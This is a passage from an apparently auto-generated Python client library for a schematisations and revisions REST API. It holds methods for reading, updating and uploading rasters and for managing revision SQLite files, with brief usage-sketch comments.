raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_rasters_partial_update`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_rasters_partial_update`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_rasters_partial_update`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_rasters_partial_update`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/rasters/{id}/', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RevisionRaster', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
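# Usage sketch: a partial (PATCH) update only needs the fields being changed.
# The attributes of `RevisionRaster` are not defined in this file; `name`
# below is a hypothetical field used purely for illustration.
#
#     data = RevisionRaster(name="dem_corrected")  # hypothetical field
#     raster = api.schematisations_revisions_rasters_partial_update(
#         raster_id, revision_id, schematisation_id, data)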
def schematisations_revisions_rasters_read(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_read # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_read(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RevisionRaster
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_rasters_read_with_http_info(id, revision_pk, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_rasters_read_with_http_info(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_read # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_read_with_http_info(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param _return_http_data_only: if True, return only the response data,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RevisionRaster, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_rasters_read" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_rasters_read`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_rasters_read`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_rasters_read`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/rasters/{id}/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RevisionRaster', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
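# Usage sketch: every method here accepts `async_req=True`, in which case it
# returns a thread-like handle instead of the result, as the docstrings show.
#
#     thread = api.schematisations_revisions_rasters_read(
#         raster_id, revision_id, schematisation_id, async_req=True)
#     do_other_work()  # the request runs in the background
#     raster = thread.get()  # blocks until the response is available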
def schematisations_revisions_rasters_update(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_update # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_update(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionRaster data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RevisionRaster
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_rasters_update_with_http_info(id, revision_pk, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_rasters_update_with_http_info(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_update # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_update_with_http_info(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionRaster data: (required)
:param _return_http_data_only: if True, return only the response data,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RevisionRaster, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_rasters_update" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_rasters_update`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_rasters_update`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_rasters_update`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_rasters_update`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/rasters/{id}/', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RevisionRaster', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
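# Usage sketch: the `_with_http_info` variants return a
# (data, status_code, headers) tuple instead of only the data, which is
# useful when response headers need to be inspected.
#
#     raster, status, headers = (
#         api.schematisations_revisions_rasters_update_with_http_info(
#             raster_id, revision_id, schematisation_id, data))
#     assert status == 200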
def schematisations_revisions_rasters_upload(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_upload # noqa: E501
Endpoint for uploading a raster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_upload(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param Upload data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Upload
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_rasters_upload_with_http_info(id, revision_pk, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_rasters_upload_with_http_info(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_upload # noqa: E501
Endpoint for uploading a raster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_upload_with_http_info(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param Upload data: (required)
:param _return_http_data_only: if True, return only the response data,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Upload, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_rasters_upload" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_rasters_upload`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_rasters_upload`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_rasters_upload`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_rasters_upload`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/rasters/{id}/upload/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Upload', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
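# Usage sketch: uploading a raster is a two-step flow. This endpoint returns
# an `Upload` object describing where to send the file; the actual bytes are
# then transferred separately. `Upload`'s fields are not defined in this
# file, so `filename` and `put_url` below are assumptions.
#
#     upload = api.schematisations_revisions_rasters_upload(
#         raster_id, revision_id, schematisation_id,
#         Upload(filename="dem.tif"))  # assumed field
#     # PUT the file contents to the assumed `upload.put_url` with an HTTP
#     # client of choice.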
def schematisations_revisions_read(self, id, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_read # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_read(id, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: SchematisationRevision
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_read_with_http_info(id, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_read_with_http_info(self, id, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_read # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_read_with_http_info(id, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param _return_http_data_only: if True, return only the response data,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(SchematisationRevision, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'schematisation_pk'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_read" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_read`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_read`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{id}/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SchematisationRevision', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
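# Behaviour sketch: with `api_client.client_side_validation` enabled (the
# generator's default), a missing required parameter raises `ApiValueError`
# locally, before any request is sent.
#
#     try:
#         api.schematisations_revisions_read(None, schematisation_id)
#     except ApiValueError:
#         pass  # `id` is required but was None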
def schematisations_revisions_sqlite_delete(self, id, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_sqlite_delete # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_sqlite_delete(id, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_sqlite_delete_with_http_info(id, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_sqlite_delete_with_http_info(self, id, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_sqlite_delete # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_sqlite_delete_with_http_info(id, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param _return_http_data_only: if True, return only the response data,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'schematisation_pk'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_sqlite_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_sqlite_delete`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_sqlite_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{id}/sqlite/delete/', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
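# Usage sketch: `_request_timeout` accepts either a single number (total
# timeout in seconds) or a (connection, read) tuple, as documented above.
#
#     api.schematisations_revisions_sqlite_delete(
#         revision_id, schematisation_id, _request_timeout=(3.05, 27))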
def schematisations_revisions_sqlite_download(self, id, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_sqlite_download # noqa: E501
Endpoint for downloading files. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_sqlite_download(id, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Download
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_sqlite_download_with_http_info(id, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_sqlite_download_with_http_info(self, id, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_sqlite_download # noqa: E501
Endpoint for downloading files. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_sqlite_download_with_http_info(id, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param _return_http_data_only: if True, return only the response data,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Download, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'schematisation_pk'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_sqlite_download" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_sqlite_download`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_sqlite_download`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{id}/sqlite/download/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Download', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
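# Usage sketch: with `_preload_content=False` the raw `urllib3.HTTPResponse`
# is returned without being read or deserialized (per the docstring above),
# so the body can be consumed explicitly.
#
#     raw = api.schematisations_revisions_sqlite_download(
#         revision_id, schematisation_id, _preload_content=False)
#     body = raw.data  # read the undecoded bytes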
def schematisations_revisions_sqlite_upload(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""Endpoint for uploading the sqlite file. # noqa: E501
The file should preferably be zipped (deflate). If a sqlite file is already present, it is replaced. An optional md5sum (of the compressed sqlite file) can be supplied to detect whether the file has already been uploaded and to perform de-duplication. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_sqlite_upload(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param SqliteFileUpload data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Upload
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_sqlite_upload_with_http_info(id, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_sqlite_upload_with_http_info(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""Endpoint for uploading the sqlite file. # noqa: E501
The file should preferably be zipped (deflate). If a sqlite file is already present, it is replaced. An optional md5sum (of the compressed sqlite file) can be supplied to detect whether the file has already been uploaded and to perform de-duplication. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_sqlite_upload_with_http_info(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param SqliteFileUpload data: (required)
:param _return_http_data_only: if True, return only the response data,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
